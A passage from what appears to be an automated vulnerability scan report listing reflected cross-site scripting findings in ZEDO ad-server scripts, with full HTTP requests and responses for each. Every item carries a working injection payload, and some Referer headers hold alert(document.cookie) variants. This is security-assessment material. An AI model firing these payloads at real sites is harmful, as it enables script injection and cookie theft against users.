                                                                                                                                               var zzStr = "s=1;u=unknown;z="
...[SNIP]...

6.10. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3133'%3balert(1)//414af5fb42a was submitted in the $ parameter. This input was echoed as c3133';alert(1)//414af5fb42a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=c3133'%3balert(1)//414af5fb42a&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:c3133';alert(1)//414af5fb42a;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:13 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=121
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:13 GMT
Connection: close
Content-Length: 2342

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',c3133';alert(1)//414af5fb42a';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,c3133';alert(1)//414af5fb42a;z="+Math.random();}

if(zzuid=='unknown')zzuid='-SHATcGt89Z6bBFZFIn3XV-r~050311';

var zzhasA
...[SNIP]...

6.11. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c90d'%3balert(1)//aabec897c95 was submitted in the $ parameter. This input was echoed as 9c90d';alert(1)//aabec897c95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=9c90d'%3balert(1)//aabec897c95&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:9c90d';alert(1)//aabec897c95;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675796|0,1,1;expires=Thu, 02 Jun 2011 15:40:57 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=CSLATcGt89ZwKc5Sm87@K-RQ~050311;expires=Fri, 30 Apr 2021 15:40:57 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:57 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=137
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:57 GMT
Connection: close
Content-Length: 2543

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',9c90d';alert(1)//aabec897c95';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,9c90d';alert(1)//aabec897c95;z="+Math.random();}

var zzhasAd=undefined;


                               
...[SNIP]...

6.12. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7764c'%3balert(1)//3563881838f was submitted in the q parameter. This input was echoed as 7764c';alert(1)//3563881838f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=7764c'%3balert(1)//3563881838f&$=&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:12 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=122
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:12 GMT
Connection: close
Content-Length: 2339

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='7764c';alert(1)//3563881838f';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=7764c';alert(1)//3563881838f;z="+Math.random();}

if(zzuid=='unknown')zzuid='-SHATcGt89Z6bBFZFIn3XV-r~050311';

var zzhasAd
...[SNIP]...

6.13. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abc8e'%3balert(1)//755fc26b348 was submitted in the q parameter. This input was echoed as abc8e';alert(1)//755fc26b348 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=abc8e'%3balert(1)//755fc26b348&$=&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:55 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675816|0,1,1;expires=Thu, 02 Jun 2011 15:40:55 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=ByLATcGt89a8pBwW75WfG3Fi~050311;expires=Fri, 30 Apr 2021 15:40:55 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:55 GMT
Connection: close
Content-Length: 2261

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='abc8e';alert(1)//755fc26b348';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=abc8e';alert(1)//755fc26b348;z="+Math.random();}

var zzhasAd=undefined;


                           
...[SNIP]...

6.14. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ff81"%3balert(1)//ead3d160fc3 was submitted in the q parameter. This input was echoed as 5ff81";alert(1)//ead3d160fc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=5ff81"%3balert(1)//ead3d160fc3&$=&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:12 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=122
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:12 GMT
Connection: close
Content-Length: 2339

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='5ff81";alert(1)//ead3d160fc3';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=5ff81";alert(1)//ead3d160fc3;z="+Math.random();}

if(zzuid=='unknown')zzuid='-SHATcGt89Z6bBFZFIn3XV-r~050311';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=-SHATcGt89Z6bBFZ
...[SNIP]...

6.15. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 358a8"%3balert(1)//aa5cf3e9e9f was submitted in the q parameter. This input was echoed as 358a8";alert(1)//aa5cf3e9e9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=358a8"%3balert(1)//aa5cf3e9e9f&$=&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:55 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#778908|0,1,1;expires=Thu, 02 Jun 2011 15:40:55 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=ByLATcGt89aI5vwvuTkcIrQs~050311;expires=Fri, 30 Apr 2021 15:40:55 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:55 GMT
Connection: close
Content-Length: 2284

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='358a8";alert(1)//aa5cf3e9e9f';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=358a8";alert(1)//aa5cf3e9e9f;z="+Math.random();}

var zzhasAd=undefined;


                                                                                                           var zzStr = "s=1;u=unknown;z=" + Math.random();
var
...[SNIP]...

6.16. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49922"%3balert(1)//84fc01aee65 was submitted in the $ parameter. This input was echoed as 49922";alert(1)//84fc01aee65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=49922"%3balert(1)//84fc01aee65&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:49922";alert(1)//84fc01aee65;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:54 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=BiLATcGt89bj@yEPgqr2WWJl~050311;expires=Fri, 30 Apr 2021 15:40:54 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:54 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:54 GMT
Connection: close
Content-Length: 2889

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',49922";alert(1)//84fc01aee65';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,49922";alert(1)//84fc01aee65;z="+Math.random();}

if(zzuid=='unknown')zzuid='unknown';

var zzhasAd=undefined;


                                   var zzStr = "s=1;u=unknown;z=" + Math.random();
var ainf
...[SNIP]...

6.17. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2748'%3balert(1)//d2806d13839 was submitted in the $ parameter. This input was echoed as b2748';alert(1)//d2806d13839 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=b2748'%3balert(1)//d2806d13839&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:b2748';alert(1)//d2806d13839;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:54 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=BiLATcGt89bC2qMYwYFFL0X3~050311;expires=Fri, 30 Apr 2021 15:40:54 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:54 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:54 GMT
Connection: close
Content-Length: 2889

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',b2748';alert(1)//d2806d13839';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,b2748';alert(1)//d2806d13839;z="+Math.random();}

if(zzuid=='unknown')zzuid='unknown';

var zzhasAd=undefined;



...[SNIP]...

6.18. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d68c6'%3balert(1)//1b7b6b54f66 was submitted in the q parameter. This input was echoed as d68c6';alert(1)//1b7b6b54f66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=5&d=9&q=d68c6'%3balert(1)//1b7b6b54f66&$=&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:54 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:54 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=BiLATcGt89amjI50-w4PEU7H~050311;expires=Fri, 30 Apr 2021 15:40:54 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:54 GMT
Connection: close
Content-Length: 2886

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='d68c6';alert(1)//1b7b6b54f66';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=d68c6';alert(1)//1b7b6b54f66;z="+Math.random();}

if(zzuid=='unknown')zzuid='unknown';

var zzhasAd=undefined;



...[SNIP]...

6.19. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d87ee"%3balert(1)//8b6d12f37ea was submitted in the q parameter. This input was echoed as d87ee";alert(1)//8b6d12f37ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=5&d=9&q=d87ee"%3balert(1)//8b6d12f37ea&$=&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:53 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:53 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=BSLATcGt89YzHY4DG2oMe7A6~050311;expires=Fri, 30 Apr 2021 15:40:53 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=141
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:53 GMT
Connection: close
Content-Length: 2886

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='d87ee";alert(1)//8b6d12f37ea';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=d87ee";alert(1)//8b6d12f37ea;z="+Math.random();}

if(zzuid=='unknown')zzuid='unknown';

var zzhasAd=undefined;


                                   var zzStr = "s=1;u=unknown;z=" + Math.random();
var ainf
...[SNIP]...

6.20. http://ib.adnxs.com/ptj [redir parameter]

